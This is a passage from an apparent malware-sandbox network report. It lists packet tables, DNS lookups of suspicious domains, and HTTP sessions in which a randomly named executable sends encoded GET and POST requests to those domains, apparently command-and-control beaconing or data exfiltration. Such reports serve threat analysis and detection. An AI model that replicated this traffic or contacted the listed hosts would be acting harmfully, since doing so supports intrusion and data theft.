                                        Sep 27, 2024 06:36:52.047997952 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:52.048017979 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:52.048136950 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:52.118011951 CEST5497680192.168.2.7162.0.238.238
                                        Sep 27, 2024 06:36:52.123461008 CEST8054976162.0.238.238192.168.2.7
                                        Sep 27, 2024 06:36:57.145180941 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.150454998 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:57.150580883 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.165026903 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:57.172893047 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:58.671478987 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:58.676640034 CEST80549773.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:58.677810907 CEST5497780192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:59.889765024 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:36:59.894687891 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:36:59.900166988 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:00.077619076 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:00.082432032 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:01.304496050 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:01.304579973 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:01.577883005 CEST5497880192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:01.582719088 CEST80549783.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.596853971 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.601639032 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.601828098 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.613140106 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:02.617963076 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:02.618314981 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:03.057991028 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:03.058041096 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:04.124636889 CEST5497980192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:04.129484892 CEST80549793.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.268264055 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.273139954 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.273209095 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.286014080 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.290880919 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.757775068 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.757869005 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:05.760551929 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.809705973 CEST5498080192.168.2.73.33.130.190
                                        Sep 27, 2024 06:37:05.814713955 CEST80549803.33.130.190192.168.2.7
                                        Sep 27, 2024 06:37:10.859147072 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.864077091 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:10.865916967 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.877783060 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:10.882673025 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483444929 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483520985 CEST805498134.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:11.483803988 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:12.421020031 CEST5498180192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.441030025 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.445990086 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:13.446139097 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.458482981 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:13.463319063 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082459927 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082557917 CEST805498234.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:14.082621098 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:14.968509912 CEST5498280192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.252645016 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.257487059 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.257638931 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.270239115 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:17.275059938 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.275186062 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893306971 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893363953 CEST805498334.76.205.124192.168.2.7
                                        Sep 27, 2024 06:37:17.893518925 CEST5498380192.168.2.734.76.205.124
                                        Sep 27, 2024 06:37:18.781035900 CEST5498380192.168.2.734.76.205.124

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 27, 2024 06:34:41.506369114 CEST5363021162.159.36.2192.168.2.7
                                        Sep 27, 2024 06:34:42.001785040 CEST6123653192.168.2.71.1.1.1
                                        Sep 27, 2024 06:34:42.010407925 CEST53612361.1.1.1192.168.2.7
                                        Sep 27, 2024 06:34:49.432879925 CEST6017253192.168.2.71.1.1.1
                                        Sep 27, 2024 06:34:49.443682909 CEST53601721.1.1.1192.168.2.7
                                        Sep 27, 2024 06:34:54.455797911 CEST6321753192.168.2.71.1.1.1
                                        Sep 27, 2024 06:34:54.673072100 CEST53632171.1.1.1192.168.2.7
                                        Sep 27, 2024 06:35:15.863442898 CEST6132153192.168.2.71.1.1.1
                                        Sep 27, 2024 06:35:15.877310038 CEST53613211.1.1.1192.168.2.7
                                        Sep 27, 2024 06:35:29.191807985 CEST5260353192.168.2.71.1.1.1
                                        Sep 27, 2024 06:35:29.814960003 CEST53526031.1.1.1192.168.2.7
                                        Sep 27, 2024 06:36:03.879165888 CEST4931553192.168.2.71.1.1.1
                                        Sep 27, 2024 06:36:03.890512943 CEST53493151.1.1.1192.168.2.7
                                        Sep 27, 2024 06:36:17.019195080 CEST5486453192.168.2.71.1.1.1
                                        Sep 27, 2024 06:36:17.037295103 CEST53548641.1.1.1192.168.2.7
                                        Sep 27, 2024 06:36:30.253741980 CEST5916853192.168.2.71.1.1.1
                                        Sep 27, 2024 06:36:30.267168045 CEST53591681.1.1.1192.168.2.7
                                        Sep 27, 2024 06:36:43.457740068 CEST6491653192.168.2.71.1.1.1
                                        Sep 27, 2024 06:36:43.479055882 CEST53649161.1.1.1192.168.2.7
                                        Sep 27, 2024 06:36:57.128874063 CEST6520553192.168.2.71.1.1.1
                                        Sep 27, 2024 06:36:57.142177105 CEST53652051.1.1.1192.168.2.7
                                        Sep 27, 2024 06:37:10.817800999 CEST4939853192.168.2.71.1.1.1
                                        Sep 27, 2024 06:37:10.854064941 CEST53493981.1.1.1192.168.2.7

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 27, 2024 06:34:42.001785040 CEST192.168.2.71.1.1.10x9468Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                        Sep 27, 2024 06:34:49.432879925 CEST192.168.2.71.1.1.10xf960Standard query (0)www.48vlu.shopA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:34:54.455797911 CEST192.168.2.71.1.1.10xf9a5Standard query (0)www.antura.partnersA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:35:15.863442898 CEST192.168.2.71.1.1.10x75cbStandard query (0)www.skystargazeguide.storeA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:35:29.191807985 CEST192.168.2.71.1.1.10x87bcStandard query (0)www.nmh6.siteA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:03.879165888 CEST192.168.2.71.1.1.10xd01Standard query (0)www.sapatarias.onlineA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:17.019195080 CEST192.168.2.71.1.1.10x8c1Standard query (0)www.softillery.infoA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:30.253741980 CEST192.168.2.71.1.1.10xa1d9Standard query (0)www.asiapartnars.onlineA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:43.457740068 CEST192.168.2.71.1.1.10xc415Standard query (0)www.priunit.onlineA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:57.128874063 CEST192.168.2.71.1.1.10xf759Standard query (0)www.consultarfacil.onlineA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:37:10.817800999 CEST192.168.2.71.1.1.10x3fd6Standard query (0)www.exhibitarrange.shopA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 27, 2024 06:34:42.010407925 CEST1.1.1.1192.168.2.70x9468Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                        Sep 27, 2024 06:34:49.443682909 CEST1.1.1.1192.168.2.70xf960Name error (3)www.48vlu.shopnonenoneA (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:34:54.673072100 CEST1.1.1.1192.168.2.70xf9a5No error (0)www.antura.partners208.91.197.27A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:35:15.877310038 CEST1.1.1.1192.168.2.70x75cbNo error (0)www.skystargazeguide.store38.180.87.102A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:35:29.814960003 CEST1.1.1.1192.168.2.70x87bcNo error (0)www.nmh6.site43.154.104.247A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:03.890512943 CEST1.1.1.1192.168.2.70xd01No error (0)www.sapatarias.online13.248.169.48A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:03.890512943 CEST1.1.1.1192.168.2.70xd01No error (0)www.sapatarias.online76.223.54.146A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:17.037295103 CEST1.1.1.1192.168.2.70x8c1No error (0)www.softillery.infosoftillery.infoCNAME (Canonical name)IN (0x0001)false
                                        Sep 27, 2024 06:36:17.037295103 CEST1.1.1.1192.168.2.70x8c1No error (0)softillery.info3.33.130.190A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:17.037295103 CEST1.1.1.1192.168.2.70x8c1No error (0)softillery.info15.197.148.33A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:30.267168045 CEST1.1.1.1192.168.2.70xa1d9No error (0)www.asiapartnars.onlineasiapartnars.onlineCNAME (Canonical name)IN (0x0001)false
                                        Sep 27, 2024 06:36:30.267168045 CEST1.1.1.1192.168.2.70xa1d9No error (0)asiapartnars.online3.33.130.190A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:30.267168045 CEST1.1.1.1192.168.2.70xa1d9No error (0)asiapartnars.online15.197.148.33A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:43.479055882 CEST1.1.1.1192.168.2.70xc415No error (0)www.priunit.online162.0.238.238A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:57.142177105 CEST1.1.1.1192.168.2.70xf759No error (0)www.consultarfacil.onlineconsultarfacil.onlineCNAME (Canonical name)IN (0x0001)false
                                        Sep 27, 2024 06:36:57.142177105 CEST1.1.1.1192.168.2.70xf759No error (0)consultarfacil.online3.33.130.190A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:36:57.142177105 CEST1.1.1.1192.168.2.70xf759No error (0)consultarfacil.online15.197.148.33A (IP address)IN (0x0001)false
                                        Sep 27, 2024 06:37:10.854064941 CEST1.1.1.1192.168.2.70x3fd6No error (0)www.exhibitarrange.shop34.76.205.124A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.antura.partners
                                        • www.skystargazeguide.store
                                        • www.nmh6.site
                                        • www.sapatarias.online
                                        • www.softillery.info
                                        • www.asiapartnars.online
                                        • www.priunit.online
                                        • www.consultarfacil.online
                                        • www.exhibitarrange.shop

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.754952208.91.197.27802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:34:54.691826105 CEST472OUTGET /w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.antura.partners
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:34:55.683835030 CEST1236INHTTP/1.1 200 OK
                                        Date: Fri, 27 Sep 2024 04:34:55 GMT
                                        Server: Apache
                                        Referrer-Policy: no-referrer-when-downgrade
                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                        Set-Cookie: vsid=912vr474957295244191699; expires=Wed, 26-Sep-2029 04:34:55 GMT; Max-Age=157680000; path=/; domain=www.antura.partners; HttpOnly
                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lR044jIWLsy9b3oVxSkVOQArV0J5x/yvjk6OLJMgl6T/C7QTVWEywIrc6K+17Dm7jmFf2kZIcSEbIk6f+4H2Tw==
                                        Content-Length: 2615
                                        Content-Type: text/html; charset=UTF-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 6c 52 30 34 34 6a 49 57 4c 73 79 39 62 33 6f 56 78 53 6b 56 4f 51 41 72 56 30 4a 35 78 2f 79 76 6a 6b 36 4f 4c 4a 4d 67 6c 36 54 2f 43 37 51 54 56 57 45 79 77 49 72 63 36 4b 2b 31 37 44 6d 37 6a 6d 46 66 32 6b 5a 49 63 53 45 62 49
                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lR044jIWLsy9b3oVxSkVOQArV0J5x/yvjk6OLJMgl6T/C7QTVWEywIrc6K+17Dm7jmFf2kZIcSEbI
                                        Sep 27, 2024 06:34:55.683855057 CEST1236INData Raw: 6b 36 66 2b 34 48 32 54 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                        Data Ascii: k6f+4H2Tw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.antura.partners/px.js?ch=1"></script><script type="text/javascript" src="http://www.antura.partners/px.js?ch=2"></script><scr
                                        Sep 27, 2024 06:34:55.683870077 CEST255INData Raw: 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f
                                        Data Ascii: ntent="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=devi
                                        Sep 27, 2024 06:34:55.684098959 CEST878INData Raw: 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c
                                        Data Ascii: itial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"'


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.75495338.180.87.102802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:15.897653103 CEST759OUTPOST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 39 75 6a 53 68 4b 6a 4a 41 43 45 6e 41 53 34 61 50 41 62 41 56 67 75 54 42 43 49 76 55 67 31 64 68 45 58 64 4b 48 47 53 48 74 4e 33 6c 77 38 30 47 77 30 56 47 50 33 73 42 75 6e 47 65 31 61 4c 6f 68 4a 6a 35 72 46 46 4e 6a 52 56 71 48 48 66 4f 68 79 4f 56 63 55 51 34 4b 56 74 30 33 57 75 63 58 6d 6a 6b 64 6f 64 66 4d 6c 6d 45 34 4e 39 41 43 58 34 6d 6a 69 7a 2f 69 43 37 53 65 37 6a 55 70 7a 59 53 52 2b 32 36 79 57 72 30 65 31 4e 77 6e 41 6f 76 53 66 39 59 54 6f 4e 65 52 72 6e 6d 35 4f 4a 62 75 52 67 62 4b 65 74 43 6b 48 50 78 70 6d 6c 7a 56 36 48 6d 51 50 72 2f 44 70 63 36 6d 39 77 77 3d 3d
                                        Data Ascii: 3h-p=AktOH2f76OxBG9ujShKjJACEnAS4aPAbAVguTBCIvUg1dhEXdKHGSHtN3lw80Gw0VGP3sBunGe1aLohJj5rFFNjRVqHHfOhyOVcUQ4KVt03WucXmjkdodfMlmE4N9ACX4mjiz/iC7Se7jUpzYSR+26yWr0e1NwnAovSf9YToNeRrnm5OJbuRgbKetCkHPxpmlzV6HmQPr/Dpc6m9ww==
                                        Sep 27, 2024 06:35:16.508824110 CEST462INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:16 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.75495438.180.87.102802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:18.448776960 CEST779OUTPOST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 65 32 6a 42 57 32 6a 64 51 43 62 2b 77 53 34 51 76 41 41 41 56 63 75 54 45 69 59 6f 68 51 31 59 7a 4d 58 63 4c 48 47 56 48 74 4e 39 46 77 35 36 6d 77 46 56 47 79 43 73 41 53 6e 47 65 68 61 4c 71 70 4a 69 4b 54 61 46 64 6a 66 64 4b 48 2f 53 75 68 79 4f 56 63 55 51 35 76 43 74 30 76 57 76 6f 72 6d 69 42 39 76 55 2f 4d 6d 6c 45 34 4e 33 51 43 54 34 6d 6a 45 7a 39 57 6f 37 55 43 37 6a 52 46 7a 59 44 52 39 34 36 79 51 6c 55 66 35 46 69 32 31 75 63 65 68 38 65 54 46 50 66 42 49 76 77 6b 73 54 35 69 39 2b 4b 79 6c 70 41 41 78 59 58 30 54 6e 79 52 69 4b 45 6b 75 30 49 6d 44 52 6f 48 35 6d 4b 53 34 52 42 42 6d 66 54 50 7a 4d 6c 73 6b 35 47 57 62 5a 72 38 3d
                                        Data Ascii: 3h-p=AktOH2f76OxBGe2jBW2jdQCb+wS4QvAAAVcuTEiYohQ1YzMXcLHGVHtN9Fw56mwFVGyCsASnGehaLqpJiKTaFdjfdKH/SuhyOVcUQ5vCt0vWvormiB9vU/MmlE4N3QCT4mjEz9Wo7UC7jRFzYDR946yQlUf5Fi21uceh8eTFPfBIvwksT5i9+KylpAAxYX0TnyRiKEku0ImDRoH5mKS4RBBmfTPzMlsk5GWbZr8=
                                        Sep 27, 2024 06:35:19.045104027 CEST462INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 27 Sep 2024 04:35:18 GMT
                                        Content-Type: text/html; charset=iso-8859-1
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.75495538.180.87.102802340C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 27, 2024 06:35:20.990653992 CEST1792OUTPOST /jnnq/ HTTP/1.1
                                        Host: www.skystargazeguide.store
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.skystargazeguide.store
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.skystargazeguide.store/jnnq/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
